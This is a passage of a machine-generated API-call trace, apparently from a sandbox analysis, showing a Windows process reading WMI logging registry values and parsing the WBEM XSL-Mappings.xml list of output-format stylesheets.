(_Size=0x18) returned 0x406f30 [0257.984] malloc (_Size=0x18) returned 0x406f50 [0257.984] malloc (_Size=0x18) returned 0x406f70 [0257.984] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0257.984] SysStringLen (param_1="\\wbem\\") returned 0x6 [0257.984] free (_Block=0x406f30) [0257.984] free (_Block=0x406f50) [0257.985] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0257.985] free (_Block=0x406f70) [0257.985] malloc (_Size=0x18) returned 0x406f30 [0257.985] malloc (_Size=0x18) returned 0x406f50 [0257.985] malloc (_Size=0x18) returned 0x406f70 [0257.985] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0257.985] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0257.985] free (_Block=0x406f30) [0257.985] free (_Block=0x406f50) [0257.985] GetCurrentThreadId () returned 0xbbc [0257.985] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x12f440 | out: phkResult=0x12f440*=0xf8) returned 0x0 [0257.985] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x12f490, lpcbData=0x12f430*=0x400 | out: lpType=0x0, lpData=0x12f490*=0x30, lpcbData=0x12f430*=0x4) returned 0x0 [0257.985] _wcsicmp (_String1="0", _String2="1") returned -1 [0257.985] _wcsicmp (_String1="0", _String2="2") returned -2 [0257.985] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x12f430*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x12f430*=0x42) returned 0x0 [0257.985] malloc (_Size=0x86) returned 0x406f90 [0257.985] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x406f90, lpcbData=0x12f430*=0x42 | out: lpType=0x0, lpData=0x406f90*=0x25, lpcbData=0x12f430*=0x42) returned 0x0 [0257.985] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0257.985] malloc (_Size=0x42) returned 0x407020 [0257.985] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0257.985] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x12f490, lpcbData=0x12f430*=0x400 | out: lpType=0x0, lpData=0x12f490*=0x36, lpcbData=0x12f430*=0xc) returned 0x0 [0257.986] _wtol (_String="65536") returned 65536 [0257.986] free (_Block=0x406f90) [0257.986] RegCloseKey (hKey=0x0) returned 0x6 [0257.986] CoCreateInstance (in: rclsid=0xff927410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff9273f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x12f938 | out: ppv=0x12f938*=0x1cd71d0) returned 0x0 [0258.016] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x1cd71d0, xmlSource=0x12fa80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x406f30), isSuccessful=0x12faf0 | out: isSuccessful=0x12faf0*=0xffff) returned 0x0 [0258.291] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x1cd71d0, DOMElement=0x12f930 | out: DOMElement=0x12f930*=0x1cdbc50) returned 0x0 [0258.292] malloc (_Size=0x18) returned 0x406f30 [0258.292] IXMLDOMElement:getElementsByTagName (in: This=0x1cdbc50, tagName="XSLFORMAT", resultList=0x12f940 | out: resultList=0x12f940*=0x1cd9cc0) returned 0x0 [0258.293] free (_Block=0x406f30) [0258.293] IXMLDOMNodeList:get_length (in: This=0x1cd9cc0, listLength=0x12fb08 | out: listLength=0x12fb08*=21) returned 0x0 [0258.294] IXMLDOMNodeList:get_item (in: This=0x1cd9cc0, index=0, listItem=0x12f910 | out: listItem=0x12f910*=0x1cdbd50) returned 0x0 [0258.294] IXMLDOMNode:get_text (in: This=0x1cdbd50, text=0x12f920 | out: text=0x12f920*="texttable.xsl") returned 0x0 [0258.294] IXMLDOMNode:get_attributes (in: This=0x1cdbd50, attributeMap=0x12f918 | out: attributeMap=0x12f918*=0x1cd78d0) returned 0x0 [0258.294] malloc (_Size=0x18) returned 0x406f30 [0258.295] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cd78d0, name="KEYWORD", namedItem=0x12f928 | out: namedItem=0x12f928*=0x1cda280) returned 0x0 [0258.295] free (_Block=0x406f30) [0258.295] IXMLDOMNode:get_nodeValue (in: This=0x1cda280, value=0x12f960 | out: value=0x12f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x4)) returned 0x0 [0258.295] malloc (_Size=0x18) returned 0x406f30 [0258.296] malloc (_Size=0x18) returned 0x406f50 [0258.296] malloc (_Size=0x30) returned 0x408080 [0258.296] IUnknown:Release (This=0x1cdbd50) returned 0x0 [0258.296] IUnknown:Release (This=0x1cd78d0) returned 0x0 [0258.296] IUnknown:Release (This=0x1cda280) returned 0x0 [0258.296] IXMLDOMNodeList:get_item (in: This=0x1cd9cc0, index=1, listItem=0x12f910 | out: listItem=0x12f910*=0x1cdbd50) returned 0x0 [0258.297] IXMLDOMNode:get_text (in: This=0x1cdbd50, text=0x12f920 | out: text=0x12f920*="textvaluelist.xsl") returned 0x0 [0258.297] IXMLDOMNode:get_attributes (in: This=0x1cdbd50, attributeMap=0x12f918 | out: attributeMap=0x12f918*=0x1cd78d0) returned 0x0 [0258.297] malloc (_Size=0x18) returned 0x406f90 [0258.297] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cd78d0, name="KEYWORD", namedItem=0x12f928 | out: namedItem=0x12f928*=0x1cda280) returned 0x0 [0258.297] free (_Block=0x406f90) [0258.297] IXMLDOMNode:get_nodeValue (in: This=0x1cda280, value=0x12f960 | out: value=0x12f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x4)) returned 0x0 [0258.297] malloc (_Size=0x18) returned 0x40c560 [0258.297] malloc (_Size=0x18) returned 0x40c580 [0258.297] SysStringLen (param_1="VALUE") returned 0x5 [0258.297] SysStringLen (param_1="TABLE") returned 0x5 [0258.297] SysStringLen (param_1="TABLE") returned 0x5 [0258.297] SysStringLen (param_1="VALUE") returned 0x5 [0258.297] malloc (_Size=0x30) returned 0x4080c0 [0258.297] IUnknown:Release (This=0x1cdbd50) returned 0x0 [0258.297] IUnknown:Release (This=0x1cd78d0) returned 0x0 [0258.297] IUnknown:Release (This=0x1cda280) returned 0x0 [0258.297] IXMLDOMNodeList:get_item (in: This=0x1cd9cc0, index=2, listItem=0x12f910 | out: listItem=0x12f910*=0x1cdbd50) returned 0x0 [0258.298] IXMLDOMNode:get_text (in: This=0x1cdbd50, text=0x12f920 | out: text=0x12f920*="textvaluelist.xsl") returned 0x0 [0258.298] IXMLDOMNode:get_attributes (in: This=0x1cdbd50, attributeMap=0x12f918 | out: attributeMap=0x12f918*=0x1cd78d0) returned 0x0 [0258.298] malloc (_Size=0x18) returned 0x40c5a0 [0258.298] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cd78d0, name="KEYWORD", namedItem=0x12f928 | out: namedItem=0x12f928*=0x1cda280) returned 0x0 [0258.298] free (_Block=0x40c5a0) [0258.298] IXMLDOMNode:get_nodeValue (in: This=0x1cda280, value=0x12f960 | out: value=0x12f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x4)) returned 0x0 [0258.298] malloc (_Size=0x18) returned 0x40c5a0 [0258.298] malloc (_Size=0x18) returned 0x40c5c0 [0258.298] SysStringLen (param_1="LIST") returned 0x4 [0258.298] SysStringLen (param_1="TABLE") returned 0x5 [0258.298] malloc (_Size=0x30) returned 0x408100 [0258.298] IUnknown:Release (This=0x1cdbd50) returned 0x0 [0258.298] IUnknown:Release (This=0x1cd78d0) returned 0x0 [0258.298] IUnknown:Release (This=0x1cda280) returned 0x0 [0258.298] IXMLDOMNodeList:get_item (in: This=0x1cd9cc0, index=3, listItem=0x12f910 | out: listItem=0x12f910*=0x1cdbd50) returned 0x0 [0258.298] IXMLDOMNode:get_text (in: This=0x1cdbd50, text=0x12f920 | out: text=0x12f920*="rawxml.xsl") returned 0x0 [0258.298] IXMLDOMNode:get_attributes (in: This=0x1cdbd50, attributeMap=0x12f918 | out: attributeMap=0x12f918*=0x1cd78d0) returned 0x0 [0258.299] malloc (_Size=0x18) returned 0x40c5e0 [0258.299] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cd78d0, name="KEYWORD", namedItem=0x12f928 | out: namedItem=0x12f928*=0x1cda280) returned 0x0 [0258.299] free (_Block=0x40c5e0) [0258.299] IXMLDOMNode:get_nodeValue (in: This=0x1cda280, value=0x12f960 | out: value=0x12f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x4)) returned 0x0 [0258.299] malloc (_Size=0x18) returned 0x40c5e0 [0258.299] malloc (_Size=0x18) returned 0x40c600 [0258.299] SysStringLen (param_1="RAWXML") returned 0x6 [0258.299] SysStringLen (param_1="TABLE") returned 0x5 [0258.299] SysStringLen (param_1="RAWXML") returned 0x6 [0258.299] SysStringLen (param_1="LIST") returned 0x4 [0258.299] SysStringLen (param_1="LIST") returned 0x4 [0258.299] SysStringLen (param_1="RAWXML") returned 0x6 [0258.299] malloc (_Size=0x30) returned 0x408140 [0258.299] IUnknown:Release (This=0x1cdbd50) returned 0x0 [0258.299] IUnknown:Release (This=0x1cd78d0) returned 0x0 [0258.299] IUnknown:Release (This=0x1cda280) returned 0x0 [0258.299] IXMLDOMNodeList:get_item (in: This=0x1cd9cc0, index=4, listItem=0x12f910 | out: listItem=0x12f910*=0x1cdbd50) returned 0x0 [0258.299] IXMLDOMNode:get_text (in: This=0x1cdbd50, text=0x12f920 | out: text=0x12f920*="htable.xsl") returned 0x0 [0258.299] IXMLDOMNode:get_attributes (in: This=0x1cdbd50, attributeMap=0x12f918 | out: attributeMap=0x12f918*=0x1cd78d0) returned 0x0 [0258.299] malloc (_Size=0x18) returned 0x40c620 [0258.300] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cd78d0, name="KEYWORD", namedItem=0x12f928 | out: namedItem=0x12f928*=0x1cda280) returned 0x0 [0258.300] free (_Block=0x40c620) [0258.300] IXMLDOMNode:get_nodeValue (in: This=0x1cda280, value=0x12f960 | out: value=0x12f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x4)) returned 0x0 [0258.300] malloc (_Size=0x18) returned 0x40c620 [0258.300] malloc (_Size=0x18) returned 0x40c640 [0258.300] SysStringLen (param_1="HTABLE") returned 0x6 [0258.300] SysStringLen (param_1="TABLE") returned 0x5 [0258.300] SysStringLen (param_1="HTABLE") returned 0x6 [0258.300] SysStringLen (param_1="LIST") returned 0x4 [0258.300] malloc (_Size=0x30) returned 0x408180 [0258.300] IUnknown:Release (This=0x1cdbd50) returned 0x0 [0258.300] IUnknown:Release (This=0x1cd78d0) returned 0x0 [0258.300] IUnknown:Release (This=0x1cda280) returned 0x0 [0258.300] IXMLDOMNodeList:get_item (in: This=0x1cd9cc0, index=5, listItem=0x12f910 | out: listItem=0x12f910*=0x1cdbd50) returned 0x0 [0258.300] IXMLDOMNode:get_text (in: This=0x1cdbd50, text=0x12f920 | out: text=0x12f920*="hform.xsl") returned 0x0 [0258.300] IXMLDOMNode:get_attributes (in: This=0x1cdbd50, attributeMap=0x12f918 | out: attributeMap=0x12f918*=0x1cd78d0) returned 0x0 [0258.300] malloc (_Size=0x18) returned 0x40c660 [0258.301] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cd78d0, name="KEYWORD", namedItem=0x12f928 | out: namedItem=0x12f928*=0x1cda280) returned 0x0 [0258.301] free (_Block=0x40c660) [0258.301] IXMLDOMNode:get_nodeValue (in: This=0x1cda280, value=0x12f960 | out: value=0x12f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x4)) returned 0x0 [0258.301] malloc (_Size=0x18) returned 0x40c660 [0258.301] malloc (_Size=0x18) returned 0x40c680 [0258.301] SysStringLen (param_1="HFORM") returned 0x5 [0258.301] SysStringLen (param_1="TABLE") returned 0x5 [0258.301] SysStringLen (param_1="HFORM") returned 0x5 [0258.301] SysStringLen (param_1="LIST") returned 0x4 [0258.301] SysStringLen (param_1="HFORM") returned 0x5 [0258.301] SysStringLen (param_1="HTABLE") returned 0x6 [0258.301] malloc (_Size=0x30) returned 0x4081c0 [0258.301] IUnknown:Release (This=0x1cdbd50) returned 0x0 [0258.301] IUnknown:Release (This=0x1cd78d0) returned 0x0 [0258.301] IUnknown:Release (This=0x1cda280) returned 0x0 [0258.301] IXMLDOMNodeList:get_item (in: This=0x1cd9cc0, index=6, listItem=0x12f910 | out: listItem=0x12f910*=0x1cdbd50) returned 0x0 [0258.301] IXMLDOMNode:get_text (in: This=0x1cdbd50, text=0x12f920 | out: text=0x12f920*="xml.xsl") returned 0x0 [0258.301] IXMLDOMNode:get_attributes (in: This=0x1cdbd50, attributeMap=0x12f918 | out: attributeMap=0x12f918*=0x1cd78d0) returned 0x0 [0258.301] malloc (_Size=0x18) returned 0x40c6a0 [0258.301] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cd78d0, name="KEYWORD", namedItem=0x12f928 | out: namedItem=0x12f928*=0x1cda280) returned 0x0 [0258.302] free (_Block=0x40c6a0) [0258.302] IXMLDOMNode:get_nodeValue (in: This=0x1cda280, value=0x12f960 | out: value=0x12f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x4)) returned 0x0 [0258.302] malloc (_Size=0x18) returned 0x40c6a0 [0258.302] malloc (_Size=0x18) returned 0x40c6c0 [0258.302] SysStringLen (param_1="XML") returned 0x3 [0258.302] SysStringLen (param_1="TABLE") returned 0x5 [0258.302] SysStringLen (param_1="XML") returned 0x3 [0258.302] SysStringLen (param_1="VALUE") returned 0x5 [0258.302] SysStringLen (param_1="VALUE") returned 0x5 [0258.302] SysStringLen (param_1="XML") returned 0x3 [0258.302] malloc (_Size=0x30) returned 0x408200 [0258.302] IUnknown:Release (This=0x1cdbd50) returned 0x0 [0258.302] IUnknown:Release (This=0x1cd78d0) returned 0x0 [0258.302] IUnknown:Release (This=0x1cda280) returned 0x0 [0258.302] IXMLDOMNodeList:get_item (in: This=0x1cd9cc0, index=7, listItem=0x12f910 | out: listItem=0x12f910*=0x1cdbd50) returned 0x0 [0258.302] IXMLDOMNode:get_text (in: This=0x1cdbd50, text=0x12f920 | out: text=0x12f920*="mof.xsl") returned 0x0 [0258.302] IXMLDOMNode:get_attributes (in: This=0x1cdbd50, attributeMap=0x12f918 | out: attributeMap=0x12f918*=0x1cd78d0) returned 0x0 [0258.302] malloc (_Size=0x18) returned 0x40c6e0 [0258.302] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cd78d0, name="KEYWORD", namedItem=0x12f928 | out: namedItem=0x12f928*=0x1cda280) returned 0x0 [0258.303] free (_Block=0x40c6e0) [0258.303] IXMLDOMNode:get_nodeValue (in: This=0x1cda280, value=0x12f960 | out: value=0x12f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x4)) returned 0x0 [0258.303] malloc (_Size=0x18) returned 0x40c6e0 [0258.303] malloc (_Size=0x18) returned 0x40c700 [0258.303] SysStringLen (param_1="MOF") returned 0x3 [0258.303] SysStringLen (param_1="TABLE") returned 0x5 [0258.303] SysStringLen (param_1="MOF") returned 0x3 [0258.303] SysStringLen (param_1="LIST") returned 0x4 [0258.303] SysStringLen (param_1="MOF") returned 0x3 [0258.303] SysStringLen (param_1="RAWXML") returned 0x6 [0258.303] SysStringLen (param_1="LIST") returned 0x4 [0258.303] SysStringLen (param_1="MOF") returned 0x3 [0258.303] malloc (_Size=0x30) returned 0x408240 [0258.303] IUnknown:Release (This=0x1cdbd50) returned 0x0 [0258.303] IUnknown:Release (This=0x1cd78d0) returned 0x0 [0258.303] IUnknown:Release (This=0x1cda280) returned 0x0 [0258.303] IXMLDOMNodeList:get_item (in: This=0x1cd9cc0, index=8, listItem=0x12f910 | out: listItem=0x12f910*=0x1cdbd50) returned 0x0 [0258.303] IXMLDOMNode:get_text (in: This=0x1cdbd50, text=0x12f920 | out: text=0x12f920*="csv.xsl") returned 0x0 [0258.303] IXMLDOMNode:get_attributes (in: This=0x1cdbd50, attributeMap=0x12f918 | out: attributeMap=0x12f918*=0x1cd78d0) returned 0x0 [0258.303] malloc (_Size=0x18) returned 0x40c720 [0258.304] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cd78d0, name="KEYWORD", namedItem=0x12f928 | out: namedItem=0x12f928*=0x1cda280) returned 0x0 [0258.304] free (_Block=0x40c720) [0258.304] IXMLDOMNode:get_nodeValue (in: This=0x1cda280, value=0x12f960 | out: value=0x12f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x4)) returned 0x0 [0258.304] malloc (_Size=0x18) returned 0x40c720 [0258.304] malloc (_Size=0x18) returned 0x40c740 [0258.304] SysStringLen (param_1="CSV") returned 0x3 [0258.304] SysStringLen (param_1="TABLE") returned 0x5 [0258.304] SysStringLen (param_1="CSV") returned 0x3 [0258.304] SysStringLen (param_1="LIST") returned 0x4 [0258.304] SysStringLen (param_1="CSV") returned 0x3 [0258.304] SysStringLen (param_1="HTABLE") returned 0x6 [0258.304] SysStringLen (param_1="CSV") returned 0x3 [0258.304] SysStringLen (param_1="HFORM") returned 0x5 [0258.304] malloc (_Size=0x30) returned 0x408280 [0258.304] IUnknown:Release (This=0x1cdbd50) returned 0x0 [0258.304] IUnknown:Release (This=0x1cd78d0) returned 0x0 [0258.304] IUnknown:Release (This=0x1cda280) returned 0x0 [0258.304] IXMLDOMNodeList:get_item (in: This=0x1cd9cc0, index=9, listItem=0x12f910 | out: listItem=0x12f910*=0x1cdbd50) returned 0x0 [0258.304] IXMLDOMNode:get_text (in: This=0x1cdbd50, text=0x12f920 | out: text=0x12f920*="texttable.xsl") returned 0x0 [0258.304] IXMLDOMNode:get_attributes (in: This=0x1cdbd50, attributeMap=0x12f918 | out: attributeMap=0x12f918*=0x1cd78d0) returned 0x0 [0258.304] malloc (_Size=0x18) returned 0x40c760 [0258.305] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cd78d0, name="KEYWORD", namedItem=0x12f928 | out: namedItem=0x12f928*=0x1cda280) returned 0x0 [0258.305] free (_Block=0x40c760) [0258.305] IXMLDOMNode:get_nodeValue (in: This=0x1cda280, value=0x12f960 | out: value=0x12f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x4)) returned 0x0 [0258.305] malloc (_Size=0x18) returned 0x40c760 [0258.305] malloc (_Size=0x18) returned 0x40c780 [0258.305] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0258.305] SysStringLen (param_1="TABLE") returned 0x5 [0258.305] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0258.305] SysStringLen (param_1="VALUE") returned 0x5 [0258.305] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0258.305] SysStringLen (param_1="XML") returned 0x3 [0258.305] SysStringLen (param_1="XML") returned 0x3 [0258.305] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0258.305] malloc (_Size=0x30) returned 0x4082c0 [0258.305] IUnknown:Release (This=0x1cdbd50) returned 0x0 [0258.305] IUnknown:Release (This=0x1cd78d0) returned 0x0 [0258.305] IUnknown:Release (This=0x1cda280) returned 0x0 [0258.305] IXMLDOMNodeList:get_item (in: This=0x1cd9cc0, index=10, listItem=0x12f910 | out: listItem=0x12f910*=0x1cdbd50) returned 0x0 [0258.305] IXMLDOMNode:get_text (in: This=0x1cdbd50, text=0x12f920 | out: text=0x12f920*="texttable.xsl") returned 0x0 [0258.305] IXMLDOMNode:get_attributes (in: This=0x1cdbd50, attributeMap=0x12f918 | out: attributeMap=0x12f918*=0x1cd78d0) returned 0x0 [0258.306] malloc (_Size=0x18) returned 0x40c7a0 [0258.306] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cd78d0, name="KEYWORD", namedItem=0x12f928 | out: namedItem=0x12f928*=0x1cda280) returned 0x0 [0258.306] free (_Block=0x40c7a0) [0258.306] IXMLDOMNode:get_nodeValue (in: This=0x1cda280, value=0x12f960 | out: value=0x12f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x4)) returned 0x0 [0258.306] malloc (_Size=0x18) returned 0x40c7a0 [0258.306] malloc (_Size=0x18) returned 0x40c7c0 [0258.306] SysStringLen (param_1="texttablewsys") returned 0xd [0258.306] SysStringLen (param_1="TABLE") returned 0x5 [0258.306] SysStringLen (param_1="texttablewsys") returned 0xd [0258.306] SysStringLen (param_1="XML") returned 0x3 [0258.306] SysStringLen (param_1="texttablewsys") returned 0xd [0258.306] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0258.306] SysStringLen (param_1="XML") returned 0x3 [0258.306] SysStringLen (param_1="texttablewsys") returned 0xd [0258.306] malloc (_Size=0x30) returned 0x408300 [0258.306] IUnknown:Release (This=0x1cdbd50) returned 0x0 [0258.306] IUnknown:Release (This=0x1cd78d0) returned 0x0 [0258.306] IUnknown:Release (This=0x1cda280) returned 0x0 [0258.306] IXMLDOMNodeList:get_item (in: This=0x1cd9cc0, index=11, listItem=0x12f910 | out: listItem=0x12f910*=0x1cdbd50) returned 0x0 [0258.306] IXMLDOMNode:get_text (in: This=0x1cdbd50, text=0x12f920 | out: text=0x12f920*="texttable.xsl") returned 0x0 [0258.307] IXMLDOMNode:get_attributes (in: This=0x1cdbd50, attributeMap=0x12f918 | out: attributeMap=0x12f918*=0x1cd78d0) returned 0x0 [0258.307] malloc (_Size=0x18) returned 0x40c7e0 [0258.307] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cd78d0, name="KEYWORD", namedItem=0x12f928 | out: namedItem=0x12f928*=0x1cda280) returned 0x0 [0258.307] free (_Block=0x40c7e0) [0258.307] IXMLDOMNode:get_nodeValue (in: This=0x1cda280, value=0x12f960 | out: value=0x12f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x4)) returned 0x0 [0258.307] malloc (_Size=0x18) returned 0x40c7e0 [0258.307] malloc (_Size=0x18) returned 0x40c800 [0258.307] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0258.307] SysStringLen (param_1="TABLE") returned 0x5 [0258.307] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0258.307] SysStringLen (param_1="XML") returned 0x3 [0258.307] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0258.307] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0258.307] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0258.307] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0258.307] malloc (_Size=0x30) returned 0x408340 [0258.307] IUnknown:Release (This=0x1cdbd50) returned 0x0 [0258.307] IUnknown:Release (This=0x1cd78d0) returned 0x0 [0258.307] IUnknown:Release (This=0x1cda280) returned 0x0 [0258.307] IXMLDOMNodeList:get_item (in: This=0x1cd9cc0, index=12, listItem=0x12f910 | out: listItem=0x12f910*=0x1cdbd50) returned 0x0 [0258.308] IXMLDOMNode:get_text (in: This=0x1cdbd50, text=0x12f920 | out: text=0x12f920*="texttable.xsl") returned 0x0 [0258.308] IXMLDOMNode:get_attributes (in: This=0x1cdbd50, attributeMap=0x12f918 | out: attributeMap=0x12f918*=0x1cd78d0) returned 0x0 [0258.308] malloc (_Size=0x18) returned 0x40c820 [0258.308] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cd78d0, name="KEYWORD", namedItem=0x12f928 | out: namedItem=0x12f928*=0x1cda280) returned 0x0 [0258.308] free (_Block=0x40c820) [0258.310] IXMLDOMNode:get_nodeValue (in: This=0x1cda280, value=0x12f960 | out: value=0x12f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x4)) returned 0x0 [0258.310] malloc (_Size=0x18) returned 0x40c820 [0258.310] malloc (_Size=0x18) returned 0x40c840 [0258.310] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0258.310] SysStringLen (param_1="TABLE") returned 0x5 [0258.310] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0258.310] SysStringLen (param_1="XML") returned 0x3 [0258.310] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0258.310] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0258.310] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0258.310] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0258.310] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0258.310] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0258.310] malloc (_Size=0x30) returned 0x408380 [0258.310] IUnknown:Release (This=0x1cdbd50) returned 0x0 [0258.310] IUnknown:Release (This=0x1cd78d0) returned 0x0 [0258.310] IUnknown:Release (This=0x1cda280) returned 0x0 [0258.310] IXMLDOMNodeList:get_item (in: This=0x1cd9cc0, index=13, listItem=0x12f910 | out: listItem=0x12f910*=0x1cdbd50) returned 0x0 [0258.311] IXMLDOMNode:get_text (in: This=0x1cdbd50, text=0x12f920 | out: text=0x12f920*="texttable.xsl") returned 0x0 [0258.311] IXMLDOMNode:get_attributes (in: This=0x1cdbd50, attributeMap=0x12f918 | out: attributeMap=0x12f918*=0x1cd78d0) returned 0x0 [0258.311] malloc (_Size=0x18) returned 0x40c860 [0258.311] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cd78d0, name="KEYWORD", namedItem=0x12f928 | out: namedItem=0x12f928*=0x1cda280) returned 0x0 [0258.311] free (_Block=0x40c860) [0258.311] IXMLDOMNode:get_nodeValue (in: This=0x1cda280, value=0x12f960 | out: value=0x12f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x4)) returned 0x0 [0258.311] malloc (_Size=0x18) returned 0x40c860 [0258.311] malloc (_Size=0x18) returned 0x40c880 [0258.311] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0258.311] SysStringLen (param_1="TABLE") returned 0x5 [0258.311] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0258.311] SysStringLen (param_1="XML") returned 0x3 [0258.311] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0258.311] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0258.311] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0258.311] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0258.311] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0258.311] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0258.311] malloc (_Size=0x30) returned 0x4083c0 [0258.312] IUnknown:Release (This=0x1cdbd50) returned 0x0 [0258.312] IUnknown:Release (This=0x1cd78d0) returned 0x0 [0258.312] IUnknown:Release (This=0x1cda280) returned 0x0 [0258.312] IXMLDOMNodeList:get_item (in: This=0x1cd9cc0, index=14, listItem=0x12f910 | out: listItem=0x12f910*=0x1cdbd50) returned 0x0 [0258.312] IXMLDOMNode:get_text (in: This=0x1cdbd50, text=0x12f920 | out: text=0x12f920*="texttable.xsl") returned 0x0 [0258.312] IXMLDOMNode:get_attributes (in: This=0x1cdbd50, attributeMap=0x12f918 | out: attributeMap=0x12f918*=0x1cd78d0) returned 0x0 [0258.312] malloc (_Size=0x18) returned 0x40c8a0 [0258.312] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cd78d0, name="KEYWORD", namedItem=0x12f928 | out: namedItem=0x12f928*=0x1cda280) returned 0x0 [0258.312] free (_Block=0x40c8a0) [0258.312] IXMLDOMNode:get_nodeValue (in: This=0x1cda280, value=0x12f960 | out: value=0x12f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x4)) returned 0x0 [0258.312] malloc (_Size=0x18) returned 0x40c8a0 [0258.312] malloc (_Size=0x18) returned 0x40c8c0 [0258.312] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0258.312] SysStringLen (param_1="TABLE") returned 0x5 [0258.312] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0258.312] SysStringLen (param_1="XML") returned 0x3 [0258.312] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0258.312] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0258.312] SysStringLen (param_1="wmiclitableformatnosys") 